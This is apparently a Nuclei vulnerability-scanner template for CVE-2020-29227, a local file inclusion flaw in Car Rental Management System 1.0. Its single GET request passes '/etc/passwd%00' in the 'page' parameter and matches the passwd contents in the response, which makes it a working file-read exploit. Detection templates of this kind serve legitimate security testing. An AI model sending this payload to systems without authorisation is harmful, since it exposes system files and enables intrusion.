39 lines
1.2 KiB
YAML
39 lines
1.2 KiB
YAML
id: CVE-2020-29227
|
|
|
|
info:
|
|
name: Car Rental Management System 1.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: critical
|
|
description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution.
|
|
reference:
|
|
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
|
|
- https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-29227
|
|
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00625
|
|
tags: cve,cve2020,lfi
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?page=/etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/16
|